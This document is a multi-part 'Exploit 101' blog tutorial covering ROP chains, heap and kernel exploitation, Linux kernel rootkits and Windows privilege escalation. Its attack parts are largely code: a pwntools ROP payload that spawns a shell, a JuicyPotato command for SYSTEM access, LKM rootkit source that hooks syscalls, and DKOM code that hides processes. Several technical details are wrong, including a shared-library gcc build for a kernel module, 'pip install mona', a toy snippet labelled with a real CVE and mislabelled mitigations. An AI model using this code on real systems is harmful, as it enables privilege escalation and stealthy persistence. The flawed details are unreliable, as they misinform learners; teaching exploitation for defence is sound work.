Monday, March 3, 2025

Exploit 101: Part 9 - Windows Exploitation Basics


In this ninth part of our Exploit 101 series, we shift focus to Windows Exploitation, covering how attackers find and exploit vulnerabilities in Windows systems for privilege escalation and remote code execution.

Understanding Windows Exploitation

Windows exploits target vulnerabilities in user-mode applications, kernel components, and network services. These exploits often aim to:

  • Escalate privileges from low-level users to SYSTEM.
  • Execute arbitrary code through memory corruption.
  • Bypass security mechanisms like DEP, ASLR, and PatchGuard.
  • Persist on a system by modifying registry, services, or scheduled tasks.

Common Windows Vulnerabilities

  1. Buffer Overflow – Overwriting memory structures to hijack execution.
  2. Privilege Escalation – Exploiting kernel flaws to elevate privileges.
  3. DLL Hijacking – Replacing legitimate DLLs with malicious versions.
  4. Token Impersonation – Abusing high-privileged access tokens.
  5. EternalBlue (SMB Exploit - CVE-2017-0144) – Remote code execution via SMB.

Setting Up a Windows Exploitation Lab

Required Tools

  • Windows 10/7 Virtual Machine (Target system)
  • Kali Linux or CommandoVM (Attacker system)
  • Metasploit Framework (Exploit development)
    sudo apt install metasploit-framework
    
  • WinDbg (Windows Debugger for analyzing crashes)
  • Immunity Debugger with Mona.py (Buffer overflow fuzzing)
    pip install mona
    

Exploit 1: Buffer Overflow in Windows

Vulnerable C Code

#include <stdio.h>
#include <string.h>

void vulnerable_function(char *input) {
    char buffer[128];
    strcpy(buffer, input); // No bounds checking
}

int main(int argc, char *argv[]) {
    if (argc < 2) {
        printf("Usage: %s <input>\n", argv[0]);
        return 1;
    }
    vulnerable_function(argv[1]);
    return 0;
}

Exploiting It

Compile with:

gcc -o vuln.exe vuln.c

Find crash offset using Mona.py in Immunity Debugger:

!mona pattern_create 300

Trigger overflow:

python -c 'print("A"*300)' | vuln.exe

Check EIP overwrite with:

!mona pattern_offset 0x41414141  # Replace with actual EIP value

Exploit 2: Privilege Escalation via Token Impersonation

Abusing SeImpersonatePrivilege

If a process has SeImpersonatePrivilege, it can escalate privileges:

  1. Check privileges:
    whoami /priv
    
  2. Use JuicyPotato exploit:
    JuicyPotato.exe -t * -p cmd.exe -l 1337
    
  3. Spawn SYSTEM shell:
    whoami  # Now running as SYSTEM
    

Windows Exploitation Mitigations

Windows includes multiple security features:

  • DEP (Data Execution Prevention) – Prevents execution of non-executable memory.
  • ASLR (Address Space Layout Randomization) – Randomizes memory addresses.
  • PatchGuard – Protects kernel structures from modification.
  • Credential Guard – Prevents credential dumping attacks.

Bypassing Protections

  • Return-Oriented Programming (ROP) – Bypasses DEP by chaining existing code.
  • Heap Spray – Predicts ASLR-protected addresses by flooding memory.
  • DLL Injection – Loads malicious code into trusted processes.

Conclusion

Windows exploitation requires understanding memory corruption, privilege escalation, and bypassing security defenses. In the next part, we will cover Advanced Windows Exploitation Techniques.

Stay tuned for Exploit 101: Part 10 – Advanced Windows Exploitation!

Exploit 101: Part 8 - Kernel Rootkits and Persistence


In this eighth part of our Exploit 101 series, we will explore Kernel Rootkits and Persistence, focusing on how attackers maintain access to a compromised system using stealthy kernel modifications.

What is a Kernel Rootkit?

A kernel rootkit is a type of malware that runs with kernel privileges, allowing it to:

  • Hide processes, files, and network connections
  • Intercept system calls and modify kernel behavior
  • Provide persistent backdoor access
  • Bypass security mechanisms like antivirus and monitoring tools

Kernel Rootkit Techniques

  1. Hooking System Calls – Modifying sys_call_table to intercept functions.
  2. Direct Kernel Object Manipulation (DKOM) – Hiding processes by modifying kernel structures.
  3. Loadable Kernel Modules (LKM) Rootkits – Dynamically loading malicious kernel code.
  4. Network Backdoor Injection – Creating hidden network sockets.
  5. Filesystem Hiding – Concealing files and directories.

Setting Up a Rootkit Development Environment

Required Tools

  • Kernel Headers (for compiling modules):
    sudo apt install linux-headers-$(uname -r)
    
  • GDB & QEMU (for debugging):
    sudo apt install gdb qemu-system-x86
    
  • LKM Development Tools:
    sudo apt install build-essential
    

Example 1: Hooking System Calls

Malicious LKM Code

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/syscalls.h>

unsigned long **sys_call_table;
static asmlinkage int (*original_sys_getdents)(unsigned int, struct linux_dirent *, unsigned int);

asmlinkage int hacked_sys_getdents(unsigned int fd, struct linux_dirent *dirp, unsigned int count) {
    int nread = original_sys_getdents(fd, dirp, count);
    return nread; // Modify this function to hide files
}

static int __init rootkit_init(void) {
    sys_call_table = (unsigned long **)kallsyms_lookup_name("sys_call_table");
    original_sys_getdents = (void *)sys_call_table[__NR_getdents];
    return 0;
}

static void __exit rootkit_exit(void) {
    sys_call_table[__NR_getdents] = (unsigned long *)original_sys_getdents;
}

module_init(rootkit_init);
module_exit(rootkit_exit);
MODULE_LICENSE("GPL");

Compiling and Loading the Rootkit

gcc -o rootkit.ko rootkit.c -fPIC -shared
sudo insmod rootkit.ko

Check if it is loaded:

lsmod | grep rootkit

Remove the rootkit:

sudo rmmod rootkit

Example 2: Hiding a Process with DKOM

Modify process structures to hide a malicious process:

struct task_struct *task;
for_each_process(task) {
    if (!strcmp(task->comm, "malicious")) {
        list_del(&task->tasks);
    }
}

Rootkit Detection and Mitigation

  • Check for Hidden Modules:
    sudo lsmod | grep suspicious_module
    
  • Scan for Rootkits using rkhunter:
    sudo apt install rkhunter
    sudo rkhunter --check
    
  • Use Kernel Integrity Monitoring (LKRG)
    sudo apt install lkrg
    

Conclusion

Kernel rootkits are dangerous and stealthy, allowing attackers to maintain persistent control. Defenders must use kernel integrity checks, system monitoring, and rootkit detection tools. In the next part, we will explore Windows Exploitation Basics.

Stay tuned for Exploit 101: Part 9 – Windows Exploitation Basics!

Exploit 101: Part 7 - Kernel Exploitation Basics


In this seventh part of our Exploit 101 series, we will introduce Kernel Exploitation, focusing on how attackers exploit vulnerabilities in the Linux kernel to achieve privilege escalation and system control.

What is Kernel Exploitation?

Kernel exploitation involves exploiting vulnerabilities in the operating system kernel, allowing an attacker to:

  • Escalate privileges (gain root access from a low-privileged user)
  • Bypass security restrictions
  • Execute arbitrary code in kernel mode
  • Achieve persistence (backdoors, rootkits)

Common Kernel Vulnerabilities

  1. Null Pointer Dereference – Accessing NULL memory in kernel space.
  2. Use-After-Free (UAF) – Reusing deallocated memory.
  3. Race Conditions – Exploiting concurrency flaws.
  4. Stack-Based Buffer Overflow – Overwriting kernel function pointers.
  5. Integer Overflow – Manipulating memory allocation sizes.

Setting Up a Kernel Exploitation Lab

1. Install a Vulnerable Kernel

To practice, use an older Linux kernel with known vulnerabilities.

Ubuntu with Kernel 4.15 (Vulnerable to CVE-2017-16995)

wget http://kernel.ubuntu.com/~kernel-ppa/mainline/v4.15/linux-image-4.15.0.deb
sudo dpkg -i linux-image-4.15.0.deb
sudo reboot

2. Debugging Kernel Exploits

  • QEMU + GDB for Kernel Debugging
qemu-system-x86_64 -kernel bzImage -append "root=/dev/sda" -s -S

Attach GDB:

gdb -ex "target remote :1234"

Exploit 1: Null Pointer Dereference

Vulnerable Kernel Code (CVE-2017-11176)

struct my_struct {
    int *ptr;
};
static struct my_struct *data;
void kernel_vuln(void) {
    if (data->ptr) {
        *(data->ptr) = 0xdeadbeef;
    }
}

This code does not check if data is NULL, leading to a NULL dereference.

Exploiting It

  1. Trigger the vulnerability:
    echo "Exploit Trigger" > /proc/vuln
    
  2. If the kernel crashes, modify execution flow using mmap().
  3. Map user-controlled memory at NULL (bypassing protections):
    mmap(0, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS, -1, 0);
    *(int *)0 = 0xdeadbeef; // Control execution
    

Exploit 2: Use-After-Free (CVE-2021-22555)

Vulnerable Code

struct user_struct *obj = kmalloc(sizeof(struct user_struct), GFP_KERNEL);
kfree(obj);
printk("User data: %s\n", obj->name);  // Accessing freed memory!

Exploiting It

  1. Spray the heap using kmalloc() to allocate a controlled structure.
  2. Overwrite function pointers in obj->name to execute shellcode.
  3. Trigger execution with the crafted object.

Kernel Exploitation Mitigations

Modern kernels implement security mechanisms like:

  • KASLR (Kernel Address Space Layout Randomization) – Makes addresses unpredictable.
  • SMEP (Supervisor Mode Execution Prevention) – Blocks userland execution.
  • KPTI (Kernel Page Table Isolation) – Mitigates Meltdown attacks.

Bypassing Protections

  • Leak Kernel Addresses – Use procfs, dmesg, or memory leaks.
  • ROP (Return-Oriented Programming) – Chain kernel gadgets to execute payloads.
  • Disable SMEP – Use ROP to modify control registers.

Conclusion

Kernel exploitation is an advanced technique requiring deep knowledge of memory management, privilege escalation, and bypassing modern mitigations. In the next part, we will cover Kernel Rootkits and Persistence Techniques.

Stay tuned for Exploit 101: Part 8 – Kernel Rootkits and Persistence!

Exploit 101: Part 6 - Advanced Heap Exploitation


In this sixth part of our Exploit 101 series, we dive deeper into Advanced Heap Exploitation, covering heap metadata corruption, fastbin attacks, unlink exploitation, and other modern heap exploitation techniques.

Understanding the Heap Allocator

Most Linux systems use glibc's ptmalloc2 as the heap allocator. Understanding its structure is key to exploiting heap vulnerabilities.

Heap Chunk Structure (ptmalloc2)

A heap chunk consists of the following fields:

+--------------------+
| Prev Size         |  (If previous chunk is free)
+--------------------+
| Size             |  (Size of this chunk + metadata flags)
+--------------------+
| User Data        |  (Allocated memory returned to malloc caller)
+--------------------+
| Padding          |  (Aligns chunk size to 8/16 bytes)
+--------------------+
| Next Chunk Size  |  (Size of next chunk if it's free)
+--------------------+

Key Heap Attack Techniques

  • Fastbin Duplication Attack – Abusing fastbins to allocate memory at arbitrary locations.
  • Unlink Exploitation – Manipulating free chunk pointers to overwrite critical data.
  • House of Force – Expanding the top chunk to overwrite memory regions.
  • House of Spirit – Allocating fake chunks to bypass protections.
  • House of Corrosion – Attacking heap metadata corruption.

Exploit 1: Fastbin Duplication Attack

Vulnerable C Code

#include <stdio.h>
#include <stdlib.h>
int main() {
    char *a = malloc(64);
    char *b = malloc(64);
    free(a);
    free(b);
    char *c = malloc(64);  // Reuses the same chunk
    strcpy(c, "Exploited!");
    printf("%s\n", c);
    return 0;
}

Exploiting Fastbin Duplication

  1. Run the binary under GDB:
    gdb -q ./fastbin_exploit
    
  2. Set breakpoints after free() to inspect heap:
    heap bins
    
  3. Corrupt the fastbin list to allocate memory at an arbitrary address.

Exploit 2: Unlink Exploitation

Vulnerable C Code

#include <stdio.h>
#include <stdlib.h>
struct Chunk {
    struct Chunk *fd;
    struct Chunk *bk;
};
int main() {
    struct Chunk *a = malloc(sizeof(struct Chunk));
    struct Chunk *b = malloc(sizeof(struct Chunk));
    free(a);
    free(b);
    a->fd = (struct Chunk*)&a - 2;
    a->bk = (struct Chunk*)&a - 1;
    malloc(sizeof(struct Chunk));
    return 0;
}

Exploiting Unlink Attack

When malloc() reuses freed memory, unlink() writes to an arbitrary address, leading to control of program execution.

Heap Exploitation Mitigations

Modern Linux systems implement heap protections:

  • Safe Linking – Protects against fastbin corruption.
  • Heap Canaries – Detects overflows before they corrupt metadata.
  • tcache (Thread Cache) – Prevents simple fastbin abuse.
  • ASLR (Address Space Layout Randomization) – Makes address prediction difficult.

Bypassing Protections

  • Heap Spraying – Flooding memory with controlled data to predict allocation.
  • Leaking Heap Addresses – Using format string vulnerabilities or memory leaks.
  • Brute Forcing – Attempting multiple allocations to find predictable heap structures.

Conclusion

Advanced heap exploitation requires deep knowledge of heap internals, allocator behavior, and bypassing modern mitigations. In the next part, we will cover Kernel Exploitation Techniques.

Stay tuned for Exploit 101: Part 7 – Kernel Exploitation Basics!

Sunday, March 2, 2025

Exploit 101: Part 5 - Heap Exploitation Basics


In the fifth part of our Exploit 101 series, we will explore heap exploitation, a technique used to manipulate memory allocation mechanisms to gain control over a program's execution.

What is Heap Exploitation?

The heap is a memory region used for dynamic allocation, where programs request memory at runtime using functions like malloc(), calloc(), and realloc(). Unlike stack-based buffer overflows, heap exploitation targets vulnerabilities in heap management to overwrite critical data structures and gain arbitrary code execution.

Common Heap Vulnerabilities

  1. Heap Buffer Overflow – Writing beyond allocated memory on the heap.
  2. Use-After-Free (UAF) – Accessing freed memory, leading to unintended behavior.
  3. Double-Free – Freeing the same memory location twice, corrupting heap structures.
  4. Heap Spraying – Filling heap memory with controlled data to redirect execution.

Setting Up Heap Exploitation Environment

Required Tools

Ensure your system has the following tools installed:

  • GDB with GEF (GDB Enhanced Features)
    sudo apt install gdb -y
    wget -O ~/.gdbinit-gef.py https://gef.blah.cat/py
    echo "source ~/.gdbinit-gef.py" >> ~/.gdbinit
    
  • Pwntools (Python Exploit Development Library)
    pip install pwntools
    
  • Libc Debugging Symbols
    sudo apt install libc6-dbg
    

Example 1: Heap Buffer Overflow

Consider the following vulnerable C code:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void vulnerable_function(char *input) {
    char *buffer = malloc(64);
    strcpy(buffer, input);  // No bounds checking
    printf("You entered: %s\n", buffer);
    free(buffer);
}

int main(int argc, char *argv[]) {
    if (argc < 2) {
        printf("Usage: %s <input>\n", argv[0]);
        return 1;
    }
    vulnerable_function(argv[1]);
    return 0;
}

The strcpy() function does not verify input length, leading to a heap overflow.

Exploiting Heap Buffer Overflow

Compile the vulnerable program:

gcc -o heap_overflow heap_overflow.c -fno-stack-protector -z execstack -g

Trigger an overflow using python:

./heap_overflow $(python -c 'print("A" * 100)')

If the program crashes, it indicates memory corruption, which can be leveraged to overwrite function pointers or heap metadata.

Example 2: Use-After-Free (UAF) Exploit

Vulnerable C Code

#include <stdio.h>
#include <stdlib.h>

int main() {
    char *ptr = malloc(64);
    strcpy(ptr, "Sensitive Data");
    free(ptr);  // Memory freed but pointer is still accessible
    printf("Use-After-Free: %s\n", ptr);  // Accessing freed memory
    return 0;
}

This program accesses freed memory, which can be exploited by allocating controlled input at the same memory location.

Exploiting UAF

Run the program:

./uaf

If the memory is reused by another allocation, an attacker can control the program flow.

Debugging Heap Exploits with GDB

Use GDB to analyze heap behavior:

gdb -q ./heap_overflow
run $(python -c 'print("A" * 100)')
heap bins  # View heap chunk allocations

Use pwndbg to visualize heap corruption:

heap chunks

Conclusion

Heap exploitation is an advanced technique requiring a deep understanding of memory management. In the next part, we will cover Advanced Heap Exploitation Techniques.

Stay tuned for Exploit 101: Part 6 – Advanced Heap Exploitation!

Exploit 101: Part 4 - Return-Oriented Programming (ROP) Basics


In the fourth part of our Exploit 101 series, we dive into Return-Oriented Programming (ROP), a powerful exploitation technique used to bypass security mitigations like Data Execution Prevention (DEP).

What is Return-Oriented Programming (ROP)?

ROP is an advanced exploitation technique that allows an attacker to execute code without injecting shellcode directly into memory. Instead, it reuses existing code snippets (gadgets) from the binary or loaded libraries to craft a malicious payload.

Why Use ROP?

  • Bypasses DEP: Since DEP prevents execution of injected shellcode, ROP leverages legitimate executable code.
  • Avoids direct shellcode injection: Uses existing functions to achieve malicious actions.
  • Works on non-executable stacks: Helps execute system calls by chaining existing instructions.

1. Understanding ROP Gadgets

ROP gadgets are small instruction sequences that end in a ret instruction. They allow control over execution flow without injecting code.

Example ROP Gadget:

pop eax
ret

This allows the attacker to control the eax register before returning execution.

Finding ROP Gadgets

Use ROPgadget to find usable instructions in a binary:

ROPgadget --binary vuln

Example output:

0x0804849b : pop eax ; ret
0x08048542 : pop ebx ; pop ecx ; ret

These gadgets can be chained together to manipulate execution flow.

2. Setting Up a ROP Attack

Step 1: Identify a Vulnerable Function

Consider this vulnerable C program:

#include <stdio.h>
#include <string.h>
void vulnerable_function(char *input) {
    char buffer[64];
    strcpy(buffer, input);
}
int main(int argc, char *argv[]) {
    vulnerable_function(argv[1]);
    return 0;
}

It lacks bounds checking, leading to a buffer overflow.

Step 2: Find the Offset

Use a cyclic pattern to find the crash offset:

from pwn import *
pattern = cyclic(100)
print(pattern)

Run the binary with the pattern and find the overwrite location in EIP/RIP:

./vuln $(python -c 'from pwn import *; print(cyclic(100))')

Check the register in GDB:

gdb -q ./vuln
run $(python -c 'from pwn import *; print(cyclic(100))')
info registers

Find the offset using:

print(cyclic_find(0x61616162))  # Replace with actual crash value

Step 3: Build the ROP Chain

Find a useful function like system():

objdump -d vuln | grep system

If system() is available, we can call it with /bin/sh to gain a shell.

Example ROP chain in Python:

from pwn import *

binary = ELF("./vuln")
system = binary.symbols['system']
bin_sh = next(binary.search(b"/bin/sh"))

payload = b"A" * 64  # Overflow buffer
payload += p32(system)  # Call system()
payload += b"AAAA"  # Return address (not needed)
payload += p32(bin_sh)  # Argument to system()

print(payload)

Run the exploit:

./vuln $(python exploit.py)

If successful, this spawns a shell.

Conclusion

ROP is an essential technique for bypassing DEP and executing code without injecting shellcode directly. In the next part, we will cover Heap Exploitation Techniques.

Stay tuned for Exploit 101: Part 5 – Heap Exploitation Basics!